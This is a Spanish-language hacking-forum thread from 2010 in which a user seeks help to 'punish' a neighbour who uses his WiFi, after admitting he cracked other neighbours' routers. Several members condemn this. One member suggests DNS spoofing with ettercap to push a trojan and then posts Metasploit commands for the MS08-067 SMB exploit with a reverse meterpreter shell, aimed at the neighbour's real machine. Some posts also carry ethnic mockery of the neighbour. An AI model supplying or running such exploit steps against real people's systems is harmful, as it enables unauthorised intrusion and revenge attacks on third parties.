Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: ucry77 en 25 Junio 2010, 12:38 pm



Título: Castigar a un intruso
Publicado por: ucry77 en 25 Junio 2010, 12:38 pm
Hola a todos. llevo muchu tiempo viendo vuestro foro y al final me toco , pediros ayuda .
A mi router se conecta un intruso por lo que veo es un chino de frutos secos que hay defrente .Porque se por que siempre cuando se abre dentro de 5min ya esta intentando conectarse y hasta que se cierra.
Hice snifer con wireshark y tambien con cain&avel pero lo unico que consegi es ver las paginas chinas y ninguna contraseña .Ademas usando airodump vi que se conecta a los otros routers , pues por ser tan cabron yo saque las claves de los otros y le bloquee en los routers de vecinos con filtrado de MACs , se que es contra la ley pero es lo que hay. Pero listo por lo que veo tiene otras antenas wifi porque me salen otros MACs pero el mismo nombre de ordenador.
Se que puedo cambiar la contraseña y algunas cosas mas ; Pero quiero castigarle  tiene puertos 135,139,445 abiertos usa wind XP y tiene dominio activado .Intente hacerlo yo con manuales del foro pero no me sale , por que hay enlases que ya dan Error y no me entero de todo.
Si podeis hecharme una mano o guiarme para meterle halgo por algun sitio  >:D .
Gracias por adelantado y por favor una ayudita.


Título: Re: Castigar a un intruso
Publicado por: simorg en 25 Junio 2010, 12:52 pm
Mmmmm, Ojo x ojo...y todos tuertos. ¿No te vale ponerte tú filtrado MAC en tu ruter ?  Y se acabó el problema.



salu2.


Título: Re: Castigar a un intruso
Publicado por: ucry77 en 25 Junio 2010, 13:02 pm
Si es lo mas facil pero tio listo , sige intentando con otros . Tambien puedo bajarme i avisarle que no se meta mas. pero lo que es facil no siempre es buena salida.


Título: Re: Castigar a un intruso
Publicado por: pazienzia en 25 Junio 2010, 13:03 pm
Hola.

El solo se conecta y navega, pero tu te has dedicado a entrar trastear y cambiar configuraciones en los routers, has cometido varios delitos en una tarde, ¡¡anda que!!

Y lo sueltas lleno de orgullo y satisfacción, mirándote al espejo y diciéndote "¡¡pero que hacker estoy hecho!!"

De verdad que cada día me sorprendéis mas, aun cuando digo que ya lo he leído todo, viene alguien y me vuelvo a sorprender.

Que poco vas a durar......

Salu2 y suerte

Advertencia - mientras estabas escribiendo, una nueva respuesta fue publicada. Probablemente desees revisar tu mensaje.

Y que importaría??


Título: Re: Castigar a un intruso
Publicado por: ucry77 en 25 Junio 2010, 13:12 pm
si una cosa que se conecta i navega y otra qe tu no tienes internet por que el ve televicion de china y te ocupa toda la red  y tardas un uevo para ver alguna pagina.y lo de delito se que es delito y si todos vamos ser tan buenos ya se puede cerrar este foro....


Título: Re: Castigar a un intruso
Publicado por: pazienzia en 25 Junio 2010, 13:20 pm
Citar
si todos vamos ser tan buenos ya se puede cerrar este foro

Te equivocas, y mucho.

Este foro es para gente buena.

La gente mala (en la que tu sólito te has incluido) no tiene cabida aquí.

Y si, se cerrara el foro, pero por gente como tu, que escribe y pregunta y afirma haber cometido delitos tipificados en el código penal.

Ponte WPA y no te metas en líos.

Si para detener a un asesino tuvieran que asesinar a 4 o 5 personas, no me preocuparía precisamente por el asesino.

Salu2 y suerte



Título: Re: Castigar a un intruso
Publicado por: ucry77 en 25 Junio 2010, 13:29 pm
ok no itento discutir con tigo de  bueno o malo  no estoy de discuciones , pero te agradezco por tus consejos lo de WPA es una salida y la conozco .


Título: Re: Castigar a un intruso
Publicado por: wpatkippsk en 25 Junio 2010, 13:31 pm
En este foro no se da soporte al intrusismo sino a la auditoría wifi propia. Simplemente como te ha dicho pazienzia con cambiar de wep a wpa habrías solucionado tu problema. Saludos.


Título: Re: Castigar a un intruso
Publicado por: 177600531 en 25 Junio 2010, 13:51 pm
Deja que se conecte a tu red para que estéis los dos en local, luego con ettercap as un dns spoofing que re direccione todas las paginas a un servidor que tengas con un troyano alojado y un java applet preferiblemente que sea el google copia el sitio y as psihing. O si no utiliza alguna vulnerabilidad que tenga con el scan de nmap y metasploit. Suerte.

Todo el mundo tiene derecho a aprender.


Título: Re: Castigar a un intruso
Publicado por: ucry77 en 25 Junio 2010, 14:10 pm
la solucion de pasar a wpa  esta hecha. pero os quento la istoria de un companiero que tiene internet con ono son 12meg y no pudo navegar bien  se conectaba por wifi con la clave WEP y  que sorpresa llevo cuando se entero que tiene uno conectado y que este individuo esta jugando juegos on-line.
Solucion: poner clave WPA y filitrado de MAC...
Sorpresa: que apartir de este momento no pudo conectarse atraves de wifi  solo por cable.
Solucion: usando airodump descubrimos que individuo de antes ,imagino que con airplay deautenticaba la MAC de portatil 2 dias continuamente ,que cuando portatil estaba apagado la MAC de su propia tarjeta emitia datos que hemos visto con airodump .
son 2 dias de llamadas a servicio tecnico y nada .
Solucion :comprando router nuevo , cambiando nombre de red , y una tarjeta wifi nueva ....
 Y que os parece la gente buena y mala.


Título: Re: Castigar a un intruso
Publicado por: pazienzia en 25 Junio 2010, 14:27 pm
A ver, entendamos una cosa, tu has admitido que le has sacado la clave a no se cuantos routers, y que has entrado y modificado datos, y eso aquí no se le da soporte.

Y como ya he dicho una vez, al que viene de esas maneras, y al que sabiendo las normas del foro, le responde con soluciones para seguir con sus maquiniavilidades, pues eso, los dos fuera y el tema borrado.

Pero bueno, el día que el foro no este, hacéis vosotros uno con vuestros buenos conocimientos sobre todo esto.

Y ya paso de esto.

Salu2 y suerte


Título: Re: Castigar a un intruso
Publicado por: 177600531 en 25 Junio 2010, 14:43 pm
A ver, entendamos una cosa, tu has admitido que le has sacado la clave a no se cuantos routers, y que has entrado y modificado datos, y eso aquí no se le da soporte.

Y como ya he dicho una vez, al que viene de esas maneras, y al que sabiendo las normas del foro, le responde con soluciones para seguir con sus maquiniavilidades, pues eso, los dos fuera y el tema borrado.

Pero bueno, el día que el foro no este, hacéis vosotros uno con vuestros buenos conocimientos sobre todo esto.

Y ya paso de esto.

Salu2 y suerte

No pidió soporte para sacar claves y modificar datos, solo pidió ayuda para alguien que jode redes a su alrededor porque lo quiere todo gratis. Si se conecta a su red tiene derecho a hacerle algo el también. Y si filtro las macs de los otros routers será para echarles una mano a sus vecinos y no para joderlos. Y lo de que ha venido de no sé qué manera y bla bla bla pues cada persona se explica lo mejor que puede no todo el mundo es perfecto como tú.

Y mejor porque no haces tú un foro de HACKING wireless y no das soporte a nada. Porque según tú de eso se trata de no dar soporte.



Título: Re: Castigar a un intruso
Publicado por: pazienzia en 25 Junio 2010, 14:54 pm
Y cuando uno de esos pobres vecinos reciba la visita de alguien con su flamante  portátil, que??

Supongo habrá dejado un aviso en el que figure su numero de teléfono, para que le llamen y entrar otra vez al router para poner esa mac en la lista.

Yo es que alucino con vosotros.


Pero si da igual.

Alguien actuara, y sin dar explicaciones.

Salu2 y suerte.


Título: Re: Castigar a un intruso
Publicado por: 177600531 en 25 Junio 2010, 15:09 pm
Y cuando uno de esos pobres vecinos reciba la visita de alguien con su flamante  portátil, que??

Supongo habrá dejado un aviso en el que figure su numero de teléfono, para que le llamen y entrar otra vez al router para poner esa mac en la lista.

Yo es que alucino con vosotros.


Pero si da igual.

Alguien actuara, y sin dar explicaciones.

Salu2 y suerte.

Y es mejor que entren otros que no conoce a que no pueda entrar un amigo con su flamante portátil. Verdad? Además no  veo lo complicado de resetear el router. O si? pff seguramente el vecino necesitara clases de informática para resetear su router a default cuando vea que su amigo no se puede conectar.


Título: Re: Castigar a un intruso
Publicado por: ucry77 en 25 Junio 2010, 15:10 pm
ok los router de vecinos ya estan bien sin su filitrado ni nada mas que les hice antes .y de verdad no era intencion de hacerlo , pero cuando con airdump ves que  #/s llegan hasta 700 y asi esta todo dia  ponte en lugar de esa gente que paga su cuota y no se entera que ay un intruso. y que no sea un familiar tuyo o quien sea


Título: Re: Castigar a un intruso
Publicado por: 177600531 en 25 Junio 2010, 15:15 pm
ok los router de vecinos ya estan bien sin su filitrado ni nada mas que les hice antes .y de verdad no era intencion de hacerlo , pero cuando con airdump ves que  #/s llegan hasta 700 y asi esta todo dia  ponte en lugar de esa gente que paga su cuota y no se entera que ay un intruso. y que no sea un familiar tuyo o quien sea


Nuestro amigo pazienzia, solo piensa en él y no se pone en el lugar de los otros. Me gustaría verlo en tu lugar no sé lo que haría el porqué según él no le tiene que dar nadie soporte.


Título: Re: Castigar a un intruso
Publicado por: ucry77 en 25 Junio 2010, 15:29 pm
No pasa nada , si llege hasta aqi me queda poco para ir mas alla y si la cosa va tan discutida ya buscare ifo en otros foros
P.S Pazienzia no quiero ofenderte ni nada parecido ; Por si acaso Tu no eres ese chino que se conecta.
Y SI EL TIENE FRUTOS SECOS Y SEGURO QUE NO PAGA TANTO IMPUESTOS COMO YO PUES QUE CONTRATA INTERNET Y QUE NO APROVECHA DE LOS OTROS.


Título: Re: Castigar a un intruso
Publicado por: pazienzia en 25 Junio 2010, 15:30 pm
Me llena de orgullo y satisfacción.... jajjaja.

Veo que has comprendido lo que intentaba decir.

El hecho de que los datas suban a esa velocidad no significa que alguien este pinchando, puede ser el mismo dueño descargando, o sabe dios que fotos estará viendo.  :silbar:


y ahora la vida según algunos.

Yo veo a alguien robando una tienda, y me digo, tengo que entrar, si tengo que entrar, y tapiar las puertas y ventanas, el dueño no volverá a entrara, pero los ladrones tampoco.

y el foro es para dar soporte para comprobar y mejorar tu red, hacerlo con una que no sea tuya es delito.

Si es que soy tonto, para que entrare al trapo. ah ya lo se, que me he tomado dos pastillas y era una sola jajajajajajja.



Salu2 y suerte


Título: Re: Castigar a un intruso
Publicado por: pazienzia en 25 Junio 2010, 15:34 pm
Pues no, no has entendido nada, joder que pena.

El no paga impuestos, y los españoles en china tampoco, que también tenemos pañoles por allí.

Seguro que si fuera un amigo tuyo el que se conectara a las redes no le decías nada, que se como funciona el ser humano.  :xD :xD :xD

Haced lo que os de la gana.

 >:D >:D >:D >:D >:D >:D

Salu2 y suerte



Título: Re: Castigar a un intruso
Publicado por: 177600531 en 25 Junio 2010, 15:39 pm
Me llena de orgullo y satisfacción.... jajjaja.

Veo que has comprendido lo que intentaba decir.

El hecho de que los datas suban a esa velocidad no significa que alguien este pinchando, puede ser el mismo dueño descargando, o sabe dios que fotos estará viendo.  :silbar:


y ahora la vida según algunos.

Yo veo a alguien robando una tienda, y me digo, tengo que entrar, si tengo que entrar, y tapiar las puertas y ventanas, el dueño no volverá a entrara, pero los ladrones tampoco.

y el foro es para dar soporte para comprobar y mejorar tu red, hacerlo con una que no sea tuya es delito.

Si es que soy tonto, para que entrare al trapo. ah ya lo se, que me he tomado dos pastillas y era una sola jajajajajajja.



Salu2 y suerte

Repito no pidió soporte para entrar en otras redes. Y lee mi primer post dije algo por el estilo deja que se conecte a tu red para que estéis en local los dos. Así que cuidado con el diazepam.


Título: Re: Castigar a un intruso
Publicado por: Debci en 25 Junio 2010, 16:03 pm
Si de veras tienes pruebas de que ha cometido un delito, lo primero refuerza la seguridad de tu red, con WPA, filtrado de macs...
Y lo segundo, guarda LOGs para poder denunciarle ante la policia, y que la ley haga el resto.


Saludos


Título: Re: Castigar a un intruso
Publicado por: simorg en 25 Junio 2010, 16:12 pm
Mmmmm, Ojo x ojo...y todos tuertos. ¿No te vale ponerte tú filtrado MAC en tu ruter ?  Y se acabó el problema.

Vale, para finalizar despues de este hazaroso hilo me cito a mi mismo, y no estaria demás que se pasara algun Mod. y diera por cerrado el tema.

Citar
El próximo miércoles se publicará en el Boletín Oficial del Estado la reforma del Código Penal, en la que se recogerá la posibilidad de imponer entre seis y dos años de cárcel por el delito de intromisión en sistemas informáticos ajenos, aunque de ello no se deriven “daños o lesiones”.
(La cita es de wolfbcn, de hoy mismo.)

Salu2.


Título: Re: Castigar a un intruso
Publicado por: 177600531 en 25 Junio 2010, 16:27 pm
Mmmmm, Ojo x ojo...y todos tuertos. ¿No te vale ponerte tú filtrado MAC en tu ruter ?  Y se acabó el problema.

Vale, para finalizar despues de este hazaroso hilo me cito a mi mismo, y no estaria demás que se pasara algun Mod. y diera por cerrado el tema.

Citar
El próximo miércoles se publicará en el Boletín Oficial del Estado la reforma del Código Penal, en la que se recogerá la posibilidad de imponer entre seis y dos años de cárcel por el delito de intromisión en sistemas informáticos ajenos, aunque de ello no se deriven “daños o lesiones”.

Salu2.

Seguramente el chino ira y denunciara al chico por haberle accedido a la compu porque él se conecta a redes ajenas xD.
Hola me llamo Chino Amarillo y he venido a denunciar que me han jodido la compu por joder yo redes. :xD


Título: Re: Castigar a un intruso
Publicado por: Debci en 25 Junio 2010, 16:29 pm
Mmmmm, Ojo x ojo...y todos tuertos. ¿No te vale ponerte tú filtrado MAC en tu ruter ?  Y se acabó el problema.

Vale, para finalizar despues de este hazaroso hilo me cito a mi mismo, y no estaria demás que se pasara algun Mod. y diera por cerrado el tema.

Citar
El próximo miércoles se publicará en el Boletín Oficial del Estado la reforma del Código Penal, en la que se recogerá la posibilidad de imponer entre seis y dos años de cárcel por el delito de intromisión en sistemas informáticos ajenos, aunque de ello no se deriven “daños o lesiones”.

Salu2.

Seguramente el chino ira y denunciara al chico por haberle accedido a la compu porque él se conecta a redes ajenas xD.
Hola me llamo Chino Amarillo y he venido a denunciar que me han jodido la compu por joder yo redes. :xD
Seria digno de ver xD

Saludos


Título: Re: Castigar a un intruso
Publicado por: ucry77 en 25 Junio 2010, 16:34 pm
por los datos que me salen con airodump incluso con la claveWPA que puse el sigue intentando conectarse imagino que tiene mejor señal con mi red que con otros. Creo que voy dejar  la clave WEP nueva y ya veremos que hara colega, lo de denunciar no lo veo bien con la ley que ay y etc.
proxi_crack me puedes giar un poco con el tema de metsploit o algunos enlases ...
por fa


Título: Re: Castigar a un intruso
Publicado por: 177600531 en 25 Junio 2010, 16:50 pm
Dijiste que tenía el puerto 445 abierto pues abre la consola de el metasploit y prueba con el ms08_067_netapi

Te dejo los comandos:

Código:
use windows/smb/ms08_067_netapi

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.x.x tu ip local

set RHOST 192.168.x.x ip local chino

exploit

Y si tienes suerte tendrás una Shell inversa. Suerte.


Título: Re: Castigar a un intruso
Publicado por: dani__ en 25 Junio 2010, 16:53 pm
Lo suyo seria denegar su mac, pero si tiene minimos conocimientos para sacar una contraseña sabe cambiar su mac.

Pero tu no puedes meterle un filtrado mac a cualquiera porque le puedes joder fastidiar mucho mas que el vecino conectandose.

Lo mas seguro es que alguno de los vecinos a los que le has puesto el filtrado mac tengan otro ordenador que cuando tu lo configuraste no estaba conectado y por tanto lo as dejado fuera de la red.

La intencion ha sido buena pero la seguridad siempre conlleva mas configuraciones y necesitas tener conociemientos para ello (mi opinion)

Si de verdad estas interesado en ayudar a tus vecinos, pon un cartel en el portal o meteles una carta en el buzon: he detectado que el chino de abajo se esta aprovechando de nuestras redes wifi, si alguien quiere que le cambie la contraseña por otra mas segura que me llame al piso... tardo 5min y navegaras mas rapido.


Título: Re: Castigar a un intruso
Publicado por: wACtOr en 25 Junio 2010, 16:56 pm
weno yo no queria entrar al trapo, pero solo quiero decir una cosa.

tanto por parte del chino, como por parte de ucryy77, ambos 2 an cometido un delito.

ami me parece bien que ucry quiera saber como entrar en otra pc. sin embargo la formula de la pregunta no es la correcta ya que como dice paciencia no se da soporte para joder al vecino. pero por ejemplo si que se da soporte de como penetrar en tu maquina virtual para hacer pruebas.


y luego tamien quiero decir una cosa. si estas en tu casa trankilamente a las 2 am viendo una peli y ves que te entra un tipo en tu casa con intencion de robarte, no intentarias hacer nada para defenderte o defender tus cosas?. o me vas a decir que entra el pollo en tu casa y tu cojes y llamas a la policia delante de el dicendole, no tio espera que e llamao a los guardias para que te lleve al calabozo una noche, te pongan una multa de 500 pavos por allanamiento de morada y vuelvas a salir, me visitas en mi casa y me das una paliza.??

sinceramente yo si puedo intentar darle una paliza al caco se la intentare dar, y si consigo reducirlo, despues llamo a los guardias , pero primero le quito las ganas de volver a entrar en una casa ajena. Posiblemente, en este hipotetico caso, acabaria yo denunciado por agresion y el otro tipo (si fuera inmigrante) saldria felizmente por la puerta. si la ley fuera de otra manera se arian las cosas de otra manera, pero como no lo son, prefiero cuidarme mi propio culo a que me lo cuide mi pais.


Seguramente a alguno no le gustara esto que escribo. pero realmente es asi..

Un saludo.



Título: Re: Castigar a un intruso
Publicado por: ucry77 en 25 Junio 2010, 17:18 pm
ok y si nos centramos en la maquina virtual o otro equipo que tengo en mi red , que es mio , y en que puedo ejecutar XP o Wind 7 o BT4 o UBUNTU


Título: Re: Castigar a un intruso
Publicado por: simorg en 25 Junio 2010, 17:21 pm
De buen rollo el Chino se lo podia montar tal que así:

(http://s3.subirimagenes.com:81/otros/4444990usersize240411.jpg)


Título: Re: Castigar a un intruso
Publicado por: 177600531 en 25 Junio 2010, 17:23 pm
De buen rollo el Chino se lo podia montar tal que así:

(http://r.i.elhacker.net/cache?url=http://s3.subirimagenes.com:81/otros/4444990usersize240411.jpg)

Si pero en vez de hacerlo así lo hizo por la fuerza bruta entrando y saliendo de donde le salía a el de los cojo… esperemos que tengamos suerte y lea este post xD.


Título: Re: Castigar a un intruso
Publicado por: Debci en 25 Junio 2010, 18:52 pm
Mira cojes un bate, cojes un mechero y un esprai desodorante, bajas a la tienda, le cojes de los ::censurado:: y le agarras mientras le apuntas con el lanzallamas en


---------------------------------CENSURADO--------------------------------------------------------------------------------

 >:D
Denunciar es siempre la mejor opcion!

Saludos


Título: Re: Castigar a un intruso
Publicado por: Paul Young en 25 Junio 2010, 20:10 pm
Bueno aqui el problema es que esta prohibido pedir esta clase de soporte para pasar a joderte a una red que no es tuya...
mas sin embargo mis estimados, seamos realistas y no hipocritas al saber todos que la mayoria de las veces se da soporte sabiendo que las intenciones no seran las mejores y ya con eso somos co-participes de un delito.
Te recomiendo ucry77 que dejes de ser tan alzadote, no te llevara a obtener la informacion que necesitas, claro a menos que te juntes con craks como proxy_crack, que ya sabemos que le gusta eso de corromper.

En fin el chino si merece ser castigado al igual que tu, pero bueno de ti alguien mas se encargara, a todos nos llega el dia no te preocupes por ahora sigue las instrucciones de proxi_crack, pero ten cuidado no vaya a ser que el chinito te salga mas abusado je je je


Título: Re: Castigar a un intruso
Publicado por: jcrack en 25 Junio 2010, 20:22 pm
claro a menos que te juntes con craks como proxy_crack, que ya sabemos que le gusta eso de corromper.

y dale hablando en contra de los cracks que gracias a ellos tienes tu windows pirata.
o sino estariamos inundados con software basura en guindos

personalmente yo no iria nunca a quejarme como un marica lloron a la policia sino que solucionaria las cosas asi como me enseñaron , para eso estudiamos hacking

 


Título: Re: Castigar a un intruso
Publicado por: Debci en 25 Junio 2010, 20:55 pm
claro a menos que te juntes con craks como proxy_crack, que ya sabemos que le gusta eso de corromper.

y dale hablando en contra de los cracks que gracias a ellos tienes tu windows pirata.
o sino estariamos inundados con software basura en guindos

personalmente yo no iria nunca a quejarme como un marica lloron a la policia sino que solucionaria las cosas asi como me enseñaron , para eso estudiamos hacking

 
Entonces demuestras lo lammer que eres, pues el hacking nunca debe usarse para vengarse.

Saludos


Título: Re: Castigar a un intruso
Publicado por: jcrack en 25 Junio 2010, 22:21 pm
 
Entonces demuestras lo lammer que eres, pues el hacking nunca debe usarse para vengarse.

Saludos
A mi no me importa si me llamas lamer o lo que sea ,yo soy feliz como soy y no necesito que me aprueben o no ninguno de ustedes.
ni me interesa demostrarte a ti ni a nadie nada
Para mi la informatica es solo una diversion pero no por ser principiante  me voy a dejar si alguien se mete conmigo
 
cambio y fuera


Título: Re: Castigar a un intruso
Publicado por: Debci en 25 Junio 2010, 23:34 pm
 
Entonces demuestras lo lammer que eres, pues el hacking nunca debe usarse para vengarse.

Saludos
A mi no me importa si me llamas lamer o lo que sea ,yo soy feliz como soy y no necesito que me aprueben o no ninguno de ustedes.
ni me interesa demostrarte a ti ni a nadie nada
Para mi la informatica es solo una diversion pero no por ser principiante  me voy a dejar si alguien se mete conmigo
 
cambio y fuera
Mmm, me parece que no captas el concepto, incentivar este tipo de cosas, es el problema, mira la definicion de lammer.
En algun momento me he emtido contigo? Yo creo que no, yo he vivido mi epoca lammer, y la reconozco y la reconocia por el entonces.

Si tratas las cosas con venganza o bien acabas demacrado, o en la carcel.

Saludos


Título: Re: Castigar a un intruso
Publicado por: pazienzia en 25 Junio 2010, 23:35 pm
Hola.

Así me gusta, aquí esta mejor.

Y cada vez me da mas pena.  :-[ :-[

Salu2 y suerte


Título: Re: Castigar a un intruso
Publicado por: pazienzia en 25 Junio 2010, 23:40 pm
Lo que convierte a un hombre en sabio, no es la sabiduría.

Lo que realmente convierte a un hombre en sabio, es la forma en la que utiliza esa sabiduría.

Ahora si que lo juro que me las piro de este tema.

Salu2 y suerte


Título: Re: Castigar a un intruso
Publicado por: plof en 25 Junio 2010, 23:42 pm
 :-\


Título: Re: Castigar a un intruso
Publicado por: ucry77 en 25 Junio 2010, 23:44 pm
si , cambiando de sitio no consegui nada solo vi ,que no hay con quien triumfar , solo bla.bla bla .
Por interes puse la clave WEP  y colega la saco en una tarde , y sigo buscando metodo de castigo pero no con la ley en la mano , por que si lo hago asi me muero de rrrrisssaaa.
por fa hechad me la mano. :silbar:


Título: Re: Castigar a un intruso
Publicado por: xv0 en 26 Junio 2010, 00:45 am
Aver tampoco es para llamar ala policia y meter al pobre chino en la carcel no sean llorones.
ucry77
Lo que hiciste a los router de los vecinos poniéndole filtro fue una burrada chaval, ahora eres como el chino, tienes muchas opciones...

Ponerte WPA, y t olvidas del chino

Si tiene los puertos 445,139,135 lanzarle un exploit para entrar en su sistema, y hacerle lo que kieras eso es cosa tuya, los 2 estais cometiendo un delito, pero tu crees que el chino iría ala policía, diciendo que me jodieron el ordena por yo joder redes :¬¬

Decirle al chino que se conecte mas a tu red.

Le tuneas la tienda con pintadas jajaja


Un saludo




Título: Re: Castigar a un intruso
Publicado por: zhyzura en 26 Junio 2010, 03:44 am
 paso de estas cosas..


acabo de leerme el post completo y ya te dieron tanto soluciones que esperabas, asi como tambien soluciones que no querias...


y como esto ya parece un chat doy el tema por cerrado


saludos